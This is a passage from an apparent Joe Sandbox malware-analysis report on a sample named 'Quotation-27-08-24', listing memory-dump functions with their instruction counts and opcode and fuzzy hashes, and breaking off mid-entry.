                                          Function 00F845B1 Relevance: .2, Instructions: 156COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                          • Instruction ID: 3a3a366afd079fc160985a2f97e376ecc22db76869ae6d6cc6c4235fd9904051
                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                          • Instruction Fuzzy Hash: D6519175E0021BABCF15EF94C841FEEBBB5AF45754F14406AE901AB240D734EE44EBA4
                                          Function 00FEE9E0 Relevance: .2, Instructions: 154COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                          • Instruction ID: b2eb7627ed255f97a1c6ae9498f4f57c3a409e42b79255aac05f5b4544d8fdfb
                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                          • Instruction Fuzzy Hash: 79512B71D00259EFDF20DF95DC81FAEB779AF80324F104629E512A7191D7749E44E790
                                          Function 01028B28 Relevance: .2, Instructions: 152COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 05aa73d7cb82b6f94ef860a3af517a382e4854dbd22f05972c8a2b970c5fb4ae
                                          • Instruction ID: 14d7957b7313fb57cf9c843f9420ca697e2bbea4a96fa2ef426475d73d03839b
                                          • Opcode Fuzzy Hash: 05aa73d7cb82b6f94ef860a3af517a382e4854dbd22f05972c8a2b970c5fb4ae
                                          • Instruction Fuzzy Hash: E94115747016259BDB6ADB2DC894B7BBBDAEF90220F18C25AF9D587280DB34D801C691
                                          Function 00FECBF0 Relevance: .1, Instructions: 148COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: abc04d7c58a1fca8a839ce164f31276022fe2fe3e78992417a4bc706508b248b
                                          • Instruction ID: 54dbb5fe192cf2a622730ea0d59e595de0d773a8deab8ed7750446f88f8f91d8
                                          • Opcode Fuzzy Hash: abc04d7c58a1fca8a839ce164f31276022fe2fe3e78992417a4bc706508b248b
                                          • Instruction Fuzzy Hash: 18519E72D00255DFCB20DFAAC8809AFBBB9FB48764B614529E555A3300DB36AD42DBD0
                                          Function 00F9A430 Relevance: .1, Instructions: 139COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2621065bc33c1d9b1c983835c299deface8c82ac85c863c350370b23720e4bad
                                          • Instruction ID: 52d41b7a3b37b719c2c29969080b2f1cbb6573f013acbef80b5e33d83d9ba25b
                                          • Opcode Fuzzy Hash: 2621065bc33c1d9b1c983835c299deface8c82ac85c863c350370b23720e4bad
                                          • Instruction Fuzzy Hash: 4E41D672B40301DBEF25EF689C81B6B3765EB44758F450429FD499B241DBBADC00A792
                                          Function 0102A9D3 Relevance: .1, Instructions: 139COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                          • Instruction ID: d5f0fcc4828d87c94ce313204fd6dcf9d31e5e1d946d2eaa8867693b7d8d7ba8
                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                          • Instruction Fuzzy Hash: DE41D531700726DFDB25CF68C984A6AB7E9FF84310B05866EE99687A41EF34ED04C791
                                          Function 00F901F8 Relevance: .1, Instructions: 138COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 851ea5275d4887fa1de09e2c2a8e34a18cf3e2524d4d7c52c1f6cbef07eb1a94
                                          • Instruction ID: cf789bc4fc400e57bb61f470cdbd5a772ef6c4fb5a637de864350ec525263c38
                                          • Opcode Fuzzy Hash: 851ea5275d4887fa1de09e2c2a8e34a18cf3e2524d4d7c52c1f6cbef07eb1a94
                                          • Instruction Fuzzy Hash: 02419C36D002199FEF15DF98C840AEEB7B5AF48710F29816AE815E7240DB359D41EBA4
                                          Function 00F8EBFC Relevance: .1, Instructions: 138COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eb1068f32dcf9a1d8a3384409ea2df3be9f6a7ebace9d87d7a1d1dda9e110346
                                          • Instruction ID: 07a188aff9d91551cb872eafcef20b8ae361255f018c3e34efdb1b0aa270a6b1
                                          • Opcode Fuzzy Hash: eb1068f32dcf9a1d8a3384409ea2df3be9f6a7ebace9d87d7a1d1dda9e110346
                                          • Instruction Fuzzy Hash: 11419072A043019FDB24EF24C885A5BB7E9FB89324F14483EE957C7611DB35E848EB51
                                          Function 00FA2750 Relevance: .1, Instructions: 137COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                          • Instruction ID: f9e75b23c083b7df33de9027196fef4a4297ace5692e0d4b1a0884458e837631
                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                          • Instruction Fuzzy Hash: D2515B75E00215DFCB14CF98C480AAEF7B2FF85724F2881AAD855A7350D770AE42DB95
                                          Function 00F66154 Relevance: .1, Instructions: 133COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45023ec3c593936baf98c40a1e561d8eb14e1738fb6ba69364559a2ae2530a64
                                          • Instruction ID: db0e907de2d7008a75c6cd42e04f36cbfd4eafddaa64950718d45997798dd4db
                                          • Opcode Fuzzy Hash: 45023ec3c593936baf98c40a1e561d8eb14e1738fb6ba69364559a2ae2530a64
                                          • Instruction Fuzzy Hash: AA511570D00216DBDF25CB64CD11BA9B7B5EF05328F1482A9E419E76D1DB39AD81EF80
                                          Function 00F60BCD Relevance: .1, Instructions: 130COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1327f453d097d5e7e04b0e8170d46418cc173003b7ae15fdbb47c5826f4b7c8
                                          • Instruction ID: 8abd6c22e94057e4b471a8cd9f7cec8539e5775706049f96a9a7f5f751fb1949
                                          • Opcode Fuzzy Hash: e1327f453d097d5e7e04b0e8170d46418cc173003b7ae15fdbb47c5826f4b7c8
                                          • Instruction Fuzzy Hash: 59418F72E002289BCB21DF65CD41BEE77B4EF49750F1141A6E908AB241DB78DE84EF91
                                          Function 0102866E Relevance: .1, Instructions: 129COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                          • Instruction ID: 58a816e00fc4596966597832989752098cc678c80e435c899b9716e5b19e0bc8
                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                          • Instruction Fuzzy Hash: 0C418679B00125ABDB15DF99CC84AAFBBFABF88610F14806AE984A7341D774DD01C750
                                          Function 00F60887 Relevance: .1, Instructions: 128COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b6d2b2b94e53986b649ae7ad521e453e5d8d0da7e86cd18b7d51a19c8cba257
                                          • Instruction ID: b6ac05e7005696cc87fce55fcfae2d204544426155540e43ad97434ae7eae0e6
                                          • Opcode Fuzzy Hash: 0b6d2b2b94e53986b649ae7ad521e453e5d8d0da7e86cd18b7d51a19c8cba257
                                          • Instruction Fuzzy Hash: 9841A3B16007019FD725CF25C880A27B7F5FF49314B248A6EE44A87752EB35E845EB90
                                          Function 00F8A470 Relevance: .1, Instructions: 127COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eae013d6aee12ac0a5ce6d76db66d18264f06e8371e5ad02fe8dcb2dff1a108b
                                          • Instruction ID: 5db5fa01306a72f3a0899f5424bb267a4fc2e63b598456be1cac2f21a5a09028
                                          • Opcode Fuzzy Hash: eae013d6aee12ac0a5ce6d76db66d18264f06e8371e5ad02fe8dcb2dff1a108b
                                          • Instruction Fuzzy Hash: 4641B432A40205CFEF25EF68D955BEE77B0FB04320F18015AD411AB295EB799D80EB61
                                          Function 00F68BF0 Relevance: .1, Instructions: 124COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b0a42c54d8491f3fae7e835744451c077087d3f3082ad6058fab6942b9ff6e7
                                          • Instruction ID: bc9525dc79b20342213f5559e7a54285725fa38b526a94c9571d591ad3779e3d
                                          • Opcode Fuzzy Hash: 1b0a42c54d8491f3fae7e835744451c077087d3f3082ad6058fab6942b9ff6e7
                                          • Instruction Fuzzy Hash: 1441E472900302CBC724DF58D941B9BB7B5FF84754F24862EE8019B256DB79D943EBA0
                                          Function 00F58918 Relevance: .1, Instructions: 123COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: acbb9855d5f9ebf5edb9a59b9e8f083f374f31c09d4b5a5af3f30161ad908c64
                                          • Instruction ID: 385f1ad909cb60b7ab3f18901edfb72bf7dee2d6a98d0d676794ff93240f5b92
                                          • Opcode Fuzzy Hash: acbb9855d5f9ebf5edb9a59b9e8f083f374f31c09d4b5a5af3f30161ad908c64
                                          • Instruction Fuzzy Hash: AF4192325083069FD311DF65CC41AABB7E9EF84B94F50092AF984E7150EB70DE09AB93
                                          Function 00F5A020 Relevance: .1, Instructions: 122COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                          • Instruction ID: f7c62d9f320e8c8a6f8b5091a1607cedd09babe7e80723153e45acc06832b2dd
                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                          • Instruction Fuzzy Hash: 7C412932E00211DBCB20DF9688507FAB761EF50736F25816AEE458B280D7758D54FF92
                                          Function 00F609AD Relevance: .1, Instructions: 122COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3050427b3bb015093d5a1d1f99fcabf03b7ddafd5fc4ee839e563bc5aef5eee7
                                          • Instruction ID: a83e5fd6659315c79ab65fa7508ebc4e27f4327e4007ed26df9344795fb2b4a1
                                          • Opcode Fuzzy Hash: 3050427b3bb015093d5a1d1f99fcabf03b7ddafd5fc4ee839e563bc5aef5eee7
                                          • Instruction Fuzzy Hash: C5418971A40700EFD320CF58C841B66BBE5EF48764F24852AE4498B252EB75ED42EB91
                                          Function 00F90710 Relevance: .1, Instructions: 121COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                          • Instruction ID: 813e5805b082235dade0607049f321c038d81a000ea7c1621ae48116e001fea9
                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                          • Instruction Fuzzy Hash: 38413871A00605EFEB24CF98C980AAAB7F4FF48710B20496DE556D7691D730EA44EFA1
                                          Function 00F6262C Relevance: .1, Instructions: 119COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 03e4ecf5121d6c1a4583018e6fca48bf4e927eb56317dabe85dde51f3378234c
                                          • Instruction ID: da0c708d4ef86cb7c8a267dd67f5266513013a6a54b2b8cd9d27930d157b7964
                                          • Opcode Fuzzy Hash: 03e4ecf5121d6c1a4583018e6fca48bf4e927eb56317dabe85dde51f3378234c
                                          • Instruction Fuzzy Hash: 0E41D2B1901B00CFCBA1EF25D941B69B7F1FF44324F2082AAD8469B6A1EB359D41EF51
                                          Function 00F9C8F9 Relevance: .1, Instructions: 116COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e6915f3f3648a1fa82a171d88e425fb01cc4ccba548d364b942207da0e61e1d
                                          • Instruction ID: dddda6c9203aa8ceca04695c8fca662e0c07796070f8d51704b039c0c766b455
                                          • Opcode Fuzzy Hash: 9e6915f3f3648a1fa82a171d88e425fb01cc4ccba548d364b942207da0e61e1d
                                          • Instruction Fuzzy Hash: 32318CB1A00345DFDB11CF58C441799BBF4FB49724F2085AAE019EB251D7769902DF90
                                          Function 00FE07C3 Relevance: .1, Instructions: 114COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 062dc017e32354384327461ddd470013e88e1e627093eb58a09f86ef07161904
                                          • Instruction ID: 2ea8283738dc6c47e8cd262c142aa4a59b1bd5c47cb3884f39e75011477fa246
                                          • Opcode Fuzzy Hash: 062dc017e32354384327461ddd470013e88e1e627093eb58a09f86ef07161904
                                          • Instruction Fuzzy Hash: B94181B15043419BD320DF25C845B9BBBE8FF88764F004A2AF598D7291DB74D944DB92
                                          Function 00FE05A7 Relevance: .1, Instructions: 111COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 93c9249153316f8875c704cdfb1871870975810877aaa46a3569395a2b9e9cb8
                                          • Instruction ID: 6f40d8c0a4413c98af1972afcf79d2039b08a3ec8e0c1438c3873673258a52bb
                                          • Opcode Fuzzy Hash: 93c9249153316f8875c704cdfb1871870975810877aaa46a3569395a2b9e9cb8
                                          • Instruction Fuzzy Hash: 4B41D272A047819FC320DF29C840B6AB3E5EFC8710F044629F89897680EB74ED54D7A6
                                          Function 00F64859 Relevance: .1, Instructions: 111COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: afb7b7f0c7db832892a8ffae2fc9e9b957fd30b457334c2740012e69b3868b4c
                                          • Instruction ID: 64a3183eca2741cd35f643b17d67a209cd88b3d2fc74ae3705775007bd60a14a
                                          • Opcode Fuzzy Hash: afb7b7f0c7db832892a8ffae2fc9e9b957fd30b457334c2740012e69b3868b4c
                                          • Instruction Fuzzy Hash: 9141E231A403018BD725EF28D894B2BB7EAEF80764F14442DF9958B291DB35ED41EB91
                                          Function 00F702E1 Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                          • Instruction ID: 59242f231ab07d82e538eab6ae4cf2de3ace30a59b120fbda23ffcc73ba9af2d
                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                          • Instruction Fuzzy Hash: 80314832A00244EFDB51CB78CC80BDABBE9EF04350F0481A6F859D7352D678D884EBA5
                                          Function 0100E3DB Relevance: .1, Instructions: 105COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dcebe1ee4a99e9d42ca19cee9ce20e6786347377d0129070505312b2b4b3a525
                                          • Instruction ID: 81c8a2d0b36f06b368d32945dfaa8db150d2b873b9a610391a0c7e5ec3292caa
                                          • Opcode Fuzzy Hash: dcebe1ee4a99e9d42ca19cee9ce20e6786347377d0129070505312b2b4b3a525
                                          • Instruction Fuzzy Hash: D731B471740705ABE723AF65CC41FAF76A8AB49B50F110428F604BB3D2CFA9DD0097A1
                                          Function 01014B4B Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 28209f012760a7e44ad1d720391430fd75844802a8964dddf71642e81dd5f620
                                          • Instruction ID: 8b484f5a326cd5aeecb992c41b60bf7ef22dc4736559c4567283de51fc3e7bc2
                                          • Opcode Fuzzy Hash: 28209f012760a7e44ad1d720391430fd75844802a8964dddf71642e81dd5f620
                                          • Instruction Fuzzy Hash: C631C5326052058FC361DF19D880E6A77E5FB80360F5944AEE9D9CB265D73AA800CF91
                                          Function 00F64260 Relevance: .1, Instructions: 102COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67ae14a6e239fdb2b2c36a44ac7bfcbeda3e2fd9379d33b6c99abd1c529783b9
                                          • Instruction ID: d793ea2ec3b0584a01a3a92a00b1f3f96329a063e80041410321bb5162c7e185
                                          • Opcode Fuzzy Hash: 67ae14a6e239fdb2b2c36a44ac7bfcbeda3e2fd9379d33b6c99abd1c529783b9
                                          • Instruction Fuzzy Hash: BB41CE72600B45DFC722DF28C986FD677E8BB49324F10842DE59A8B251CB74E844EBA0
                                          Function 01014BB0 Relevance: .1, Instructions: 101COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc023f7a8819aaacb28cab7a6922a0f163aef86146d2e3967b0d88bb36de4af6
                                          • Instruction ID: 7ca8116e42a5c7f0fa09dec104c050d4105858671080093b6359541f2c213b3b
                                          • Opcode Fuzzy Hash: cc023f7a8819aaacb28cab7a6922a0f163aef86146d2e3967b0d88bb36de4af6
                                          • Instruction Fuzzy Hash: D7317E716043058FD360DF28C881E6AB7E5FB84710F0549ADF999DB369D739E805CB91
                                          Function 00FDEB1D Relevance: .1, Instructions: 100COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a82dfc035fc2c7768d964a1c61c03ba9427b461b6746b620222b8b894a5c71e6
                                          • Instruction ID: 8ce9875289c25b15d46b6a43705bd0eb857ee795cc8bdb96a0f52c6f21a7e864
                                          • Opcode Fuzzy Hash: a82dfc035fc2c7768d964a1c61c03ba9427b461b6746b620222b8b894a5c71e6
                                          • Instruction Fuzzy Hash: E831D432A016C5ABE3326759CD48B5577DAAF80754F1D00A3A9498F7D2DB6CEC40E211
                                          Function 010261C3 Relevance: .1, Instructions: 97COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60cc53b61fc46e69cf41075ca586380ecabf0f58d2ab245f79c0287b11e334ba
                                          • Instruction ID: 9531050d6adc0038592b27cc5cea8652f7d694e99399ac4d06fc4d6ea7f7054a
                                          • Opcode Fuzzy Hash: 60cc53b61fc46e69cf41075ca586380ecabf0f58d2ab245f79c0287b11e334ba
                                          • Instruction Fuzzy Hash: 07310175A00629ABDB15CF98CC41FAEB7B9EB49B40F004168F940AB241D7B0ED00CBA0
                                          Function 0100483A Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47350fc6f980f054210b97a83de989a1739d07d45bcccf467030b754b4b1d2f4
                                          • Instruction ID: 6a944c4b91e078456a1df0901a8aae757822e38e21de966e76abaf7e19a33bb3
                                          • Opcode Fuzzy Hash: 47350fc6f980f054210b97a83de989a1739d07d45bcccf467030b754b4b1d2f4
                                          • Instruction Fuzzy Hash: 88319372A4012CABDF22DF54DC84BDEBBF5AB98350F0000E5B608E3251CB749E819F90
                                          Function 00F8EB20 Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0695e779b7ba2136da748b8790fa41f6556584688f36c860ff4e1efc7914f5c4
                                          • Instruction ID: 2f1e6fbbe51670bac03cb349c2a02020c8512b62616ab0f71174cd81d7af51a6
